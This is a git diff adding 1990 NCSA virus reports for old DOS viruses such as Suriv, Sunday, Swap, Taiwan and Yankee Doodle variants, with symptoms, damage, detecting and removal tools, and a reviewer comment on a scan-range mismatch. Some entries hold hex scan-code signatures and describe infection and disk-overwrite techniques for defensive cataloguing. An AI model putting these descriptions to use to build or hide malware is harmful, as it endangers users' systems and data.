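Review bot: the Scan Code field in ncsa111.txt gives the filler range as "Bytes 1168 through 1912" while the parent entry in ncsa110.txt (Solano 2000) gives "Bytes 1168 through 1952", yet this entry states the virus "appears to be identical to Solano 2000" in all other respects. One of the two end offsets is likely a typo; verify against a sample before anyone encodes either range in a scanner, and note in the text that the identifier is a run of a single repeated byte (DA here, 28H in the parent), not a unique code sequence.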
diff --git a/textfiles.com/virus/NCSA/ncsa112.txt b/textfiles.com/virus/NCSA/ncsa112.txt new file mode 100644 index 00000000..5911ae1b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa112.txt @@ -0,0 +1,45 @@ + Ŀ + VIRUS REPORT + Spanish JB virus + + +Host Machine: PC compatibles. + +Host Files: COM, EXE files. + +OnScreen Symptoms: No "black box" appears on the screen. + +Increase in Size of Infected Files: COM files grow by 1,808 bytes.. EXE +files are re-infected. On the first infection, they may grow by 1,808 or +1,813 bytes. EXEs grow an additional 1,808 bytes with each reinfection. + +Derived from: Jerusalem. + +Scan Code: The "sUMsDos" string does not appear in this virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa113.txt b/textfiles.com/virus/NCSA/ncsa113.txt new file mode 100644 index 00000000..42fd90d5 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa113.txt 
@@ -0,0 +1,48 @@ + Ŀ + VIRUS REPORT + SRI Virus + + +Date of Origin: April, 1989. + +Place of Origin: California + +Host Machine: PC compatibles. + +Detected by: Scanv56+. + +Removed by: CleanUp. + +Derived from: Jerusalem + + The SRI virus, first reported by Bruce Baker at SRI in April, 1989, +is a radical variation of the Jerusalem virus. It takes exactly the same +space, but has been modified extensively. The additions appear to seek +out and destroy anti-viral products. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa114.txt b/textfiles.com/virus/NCSA/ncsa114.txt new file mode 100644 index 00000000..30cdfc3e --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa114.txt 
@@ -0,0 +1,58 @@ + Ŀ + VIRUS REPORT + Sunday virus + + +Date of Origin: November, 1989. + +Place of Origin: Seattle, Washington. + +Host Machine: PC compatibles. + +Host Files: Remains resident; infects COM, EXE, overlay files. + +OnScreen Symptoms: "Today is Sunday, why do you work so hard?", +displayed on any Sunday. + +Increase in Size of Infected Files: 1636 bytes. + +Nature of Damage: Affects system run-time operation; corrupts program or +overlay files. May damage FAT. + +Detected by: Scanv49+, F-Prot. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Derived from: Jerusalem. + + This virus was discovered by several users in the Seattle, +Washington area. It activates on Sundays and displays the message - +"Today is Sunday, why do you work so hard?". Damage to the FAT sometimes +occurs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa115.txt b/textfiles.com/virus/NCSA/ncsa115.txt new file mode 100644 index 00000000..754b6cdd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa115.txt 
@@ -0,0 +1,66 @@ + Ŀ + VIRUS REPORT + Suriv01 + + +Synonyms: April 1st (COM infector), Israeli, Suriv 1.01 + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files. + +OnScreen Symptoms: "APRIL 1ST HA HA HA YOU HAVE A VIRUS" displayed on +April 1st. + +Increase in Size of Infected Files: 897 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or UnVirus. + +Derived from: Original. The Jerusalem is derived from it. + +Scan Code: 89 26 34 01 B4 19 CD 21 04 41 2E A2 65 03 2E A2 B1 03 BF 67 03 +57 8B F2 80 7C 01 3A 75 0D 8A 04 2E A2 65 03 2E A2 B1 03. You can also +search at offset 30AH for 81 F9 C4 07 72 1B 81 FA 01 04. + + Suriv01 and Suriv02 appeared at about the same time, first +discovered in Israel. They were shortly merged into one virus, (Suriv03) +which evolved into the well-known Jerusalem virus. That virus was then +used as a basis for the Fu Manchu virus. + + On April 1, if an infected program is run, it will display the +message "APRIL 1ST HA HA HA YOU HAVE A VIRUS", then lock up the system. +This virus contains the identifying text string "sURIV 1.01". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa116.txt b/textfiles.com/virus/NCSA/ncsa116.txt new file mode 100644 index 00000000..d3799690 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa116.txt 
@@ -0,0 +1,68 @@ + Ŀ + VIRUS REPORT + Suriv02 + + +Synonyms: April 1st-B, Suriv 2.01 + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +OnScreen Symptoms: None. + +Increase in Size of Infected Files: 1488 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, UnVirus. + +Derived from: Suriv01. + +Scan Code: You can search at offset 05EH for 81 F9 C4 07 72 28 81 FA 01 +04. + + This virus is identical to Suriv01, except: + +* It only infects EXE files. + +* It displays no on-screen message. + +* The machine locks one hour after infection if the default date of + 1-1-80 is used. + + It is triggered the first time an infected file is run on April 1. +The virus infects an EXE file only once. The identifying string is +"sURIV 2.01". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. 
+ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa117.txt b/textfiles.com/virus/NCSA/ncsa117.txt new file mode 100644 index 00000000..2c4ce124 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa117.txt 
@@ -0,0 +1,78 @@ + Ŀ + VIRUS REPORT + Suriv03 + + +Synonyms: Israeli, Suriv 3.00 + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, overlay files. Does not +infect COMMAND.COM + +OnScreen Symptoms: A black square may appear on the screen after +activation. + +Increase in Size of Infected Files: 1813 bytes (COM files) and 1808 bytes +(EXE files). + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or UnVirus. + +Derived from: Suriv02. + +Scan Code: You can search at offset 099H for FC B4 E0 CD 21 80 FC E0 73 +16. + + This virus is nearly identical to the Jerusalem virus, which is much +better known, and which was derived from it. The virus activates on +Friday the 13 when an infected program is run. + + It does not delete files, due to a bug in its code. On other days, +after the virus is memory resident for 30 seconds, an area of the screen +is turned into a "black window" and a time wasting loop is executed. + + Differences from the Jerusalem virus: + +* the string "sUMsDos" found in the Jerusalem is "sURIV 3.00" in this + version. + +* the 30 minute delay (before machine slow-down) in the Jerusalem is 30 + seconds in this version (making detection easier with this virus than + with the Jerusalem); + +* there is a bug in the program delete function of the virus, making + this version less lethal than the Jerusalem. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. 
Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa118.txt b/textfiles.com/virus/NCSA/ncsa118.txt new file mode 100644 index 00000000..71432c25 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa118.txt 
@@ -0,0 +1,104 @@ + Ŀ + VIRUS REPORT + Swap + + +Synonyms: Israeli Boot, Falling Letters Boot, Fat 12 + +Date of Origin: August, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy disk boot sector. + +OnScreen Symptoms: Cascading letters on screen 10 minutes after +activation. + +Increase in Size of Infected Files: n/a. The virus code is 740 bytes. It +uses 2K of memory, once resident. + +Nature of Damage: Corrupts or overwrites boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: MDisk, CleanUp, F-Prot, or the DOS SYS command. + + First studied by Yuval Tal of Israel, and called "the swap virus" +because the message "The Swapping-Virus..." sometimes appears in it and +the words "SWAP VIRUS FAT12" appeared in a modified boot sector on his +disk. Other virus researchers cannot see how the virus would produce +this code, and have suggested that Mr. Tal placed the words there +himself, to help him identify the virus. Since the other researchers +haven't found the word "SWAP" anywhere, they have argued against the +name "Swap", but no one has come up with a better one. "Israeli boot +virus" will suffice only until there is a second virus from Israel that +infects the boot sector (3-4 minutes from now, at the rate we're going!). + + At any rate, this virus may write the following string into bytes +B7-E4 of track 39, sector 7 (if sectors 6 and 7 are empty): + +The Swapping-Virus. (C) June, 1989 by the CIA + + When this virus replicates, however, the message transfers as binary +zeros. Someone may have placed the text message into the virus thinking +that it would replicate along with the virus. + + The Swap virus is somewhat different from other PC boot sector +viruses. Normally a BSV replaces the boot sector with virus code, and +stores the original boot sector somewhere. 
In some cases (Ping-Pong, +Typo, Brain) the boot sector is stored in unused space, which is then +marked as bad in the FAT. In other cases (Yale, Den Zuk, StonedDen Zuk +virus), the virus stores the boot sector in a sector that is not likely +to be used. One virus (Pentagon) even stores the boot sector in a hidden +file. + + When the computer is booted from a disk infected with the a normal +boot sector infecting virus, the code on the boot sector will read the +rest of the virus into memory. The virus will then install itself, read +the original boot sector and transfer control to it. + + Swap is different. It does not store the original boot sector at +all. Instead it assumes that bytes 196-1B4 (hex) on the boot sector +contain error messages that can be safely overwritten. This is true for +most (but not all) boot sectors. It also assumes that the boot sector +starts with a JMP instruction. Swap then replaces these bytes with code +to read the rest of the virus (which is stored at track 39, sectors 6 and +7) into memory. The virus will then execute the original boot code. The +fact that this virus does not store the original boot sector makes it +hard (and in some cases impossible) to repair an infected +diskette. + + The Swap virus activates after being memory resident for 10 minutes. +A cascading effect of letters and characters on the system monitor is +then seen, similar to the cascading effect of the Cascade and Traceback +viruses. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. 
This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa119.txt b/textfiles.com/virus/NCSA/ncsa119.txt new file mode 100644 index 00000000..865b8e3a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa119.txt 
@@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + SYS Virus + + +Host Machine: PC compatibles. + +Derived from: Search-HD. + + This virus is really a modification of the Search-HD virus. The +display code has been replaced (no display occurs on reboot) by code that +disables the SYS program. The SYS program itself is not modified, but any +attempt to execute SYS will result in the program not being loaded. +Instead, multiple reads to the source and target drives will occur (to +simulate the SYS activity). The normal SYS message output is displayed +by the virus at the appropriate time. This virus will successfully avoid +being removed by SYS. The virus does no damage. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa120.txt b/textfiles.com/virus/NCSA/ncsa120.txt new file mode 100644 index 00000000..89742ae6 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa120.txt 
@@ -0,0 +1,40 @@ + Ŀ + VIRUS REPORT + SYS-B + + +Host Machine: PC compatibles. + +Derived from: SYS virus. + + This is similar to the SYS virus, but it performs a hard disk format +on any Friday 13th after 1990. This virus, and its precursor virus both +still contain the 3.5" bug, so that they are easily detected on systems +using 3.5" drives. They are difficult to detect on other systems. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa121.txt b/textfiles.com/virus/NCSA/ncsa121.txt new file mode 100644 index 00000000..66387e49 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa121.txt 
@@ -0,0 +1,36 @@ + Ŀ + VIRUS REPORT + SYS-C + + +Host Machine: PC compatibles. + + Similar to the SYS virus but performs random reboots beginning 2 +hours after power-on or initial boot. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa122.txt b/textfiles.com/virus/NCSA/ncsa122.txt new file mode 100644 index 00000000..d552ba02 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa122.txt 
@@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Taiwan Virus + + +Date of Origin: January, 1990. + +Place of Origin: Taiwan, R.O.C. + +Host Machine: PC compatibles. + +Host Files: Not memory resident. Infects COM files, including +COMMAND.COM. + +Increase in Size of Infected Files: 708 or 743 bytes. + +Nature of Damage: corrupts COM files. + +Detected by: Scanv56+, F-Prot. + +Removed by: CleanUp, Scan/D, or delete infected files. + + Whenever this virus is activated, it attempts to infect up to three +COM files. The search for uninfected COM files begins in the root +directory of C:. Once an uninfected COM file is located, the virus +infects the file by copying the viral code to the first 743 bytes of the +file, relocating the original first 743 bytes of the file to the end of +the COM file. + + If the COM file selected for infection is less than 743 bytes, the +resulting infected COM file will always be 1,486 bytes in length. This +"bug" results from a failure to check for the original file length. + + The virus is destructive. On the 8th day of any month, when an +infected program is run, the virus will perform an absolute disk write +for 160 sectors starting at logical sector 0 on the C: and D: drives, +overwriting the FATs and root directories. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa123.txt b/textfiles.com/virus/NCSA/ncsa123.txt new file mode 100644 index 00000000..690dc42a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa123.txt @@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Terse Shoe Virus + + +Host Machine: PC compatibles. + +Derived from: Shoe_virus (Ashar). + + This is a variant of the Shoe_virus with the initial text message +truncated to a single line. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa124.txt b/textfiles.com/virus/NCSA/ncsa124.txt new file mode 100644 index 00000000..af1269a0 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa124.txt @@ -0,0 +1,41 @@ + Ŀ + VIRUS REPORT + TP25VIR virus + + +Host Machine: PC compatibles. + +Derived from: Yankee Doodle virus. + + This version of the Yankee Doodle virus does not contain the string +"VACSINA", and does not beep. When the CTRL-ALT-DEL combination is +pressed, the virus plays "Yankee Doodle" and then reboots. The virus +adds new PC/MS-DOS function callL 0xC5. This function call does many +different things, and also may be used as a virus cure. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa125.txt b/textfiles.com/virus/NCSA/ncsa125.txt new file mode 100644 index 00000000..8bce6eea --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa125.txt 
@@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + TP33VIR virus + + +Host Machine: PC compatibles. + + This virus contains a self-defense mechanism. It can recover itself +if up to 16 consecutive bytes are destroyed. Self-correcting "Hemming +code" is used. The virus may not be debugged with tools other than +CodeView, because it disables interrupts 1 and 3. Yankee Doodle is +played at 5:00 PM. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa126.txt b/textfiles.com/virus/NCSA/ncsa126.txt new file mode 100644 index 00000000..0039db8a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa126.txt 
@@ -0,0 +1,35 @@ + Ŀ + VIRUS REPORT + TP34VIR virus + + +Host Machine: PC compatibles. + + This version is a TSR. Files are infected as they are run. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa127.txt b/textfiles.com/virus/NCSA/ncsa127.txt new file mode 100644 index 00000000..3ffb9c9a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa127.txt 
@@ -0,0 +1,41 @@ + Ŀ + VIRUS REPORT + TP38VIR virus + + +Host Machine: PC compatibles. + + In this version .COM and .EXE files are handled differently. The +virus is able to avoid many of "virus protection" programs which are +watching the use of "dangerous" interrupts. If the virus is active in +memory, and an infected file is loaded for debugging with CodeView, then +the virus removes itself from the file. Because the virus extracts +itself during loading with Codeview, this is a method of cleaning an +infected file. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa128.txt b/textfiles.com/virus/NCSA/ncsa128.txt new file mode 100644 index 00000000..aaf32dcd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa128.txt 
@@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + TP42VIR virus + + +Host Machine: PC compatibles. + + This version determines whether the computer is infected with the +Italian virus, and if found, tries to kill it. The Italian virus is +modified, and after each new boot the byte which contains virus version +increases by one. When the version reaches zero, the virus disables +itself, leaving only its "body" on the disk. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa129.txt b/textfiles.com/virus/NCSA/ncsa129.txt new file mode 100644 index 00000000..8e0a5331 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa129.txt 
@@ -0,0 +1,36 @@ + Ŀ + VIRUS REPORT + TP44VIR virus + + +Host Machine: PC compatibles. + + This version plays "Yankee Doodle" at 5:00pm one eighth of the time +the system is booted, making it hard to locate quickly. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa130.txt b/textfiles.com/virus/NCSA/ncsa130.txt new file mode 100644 index 00000000..785f98ca --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa130.txt 
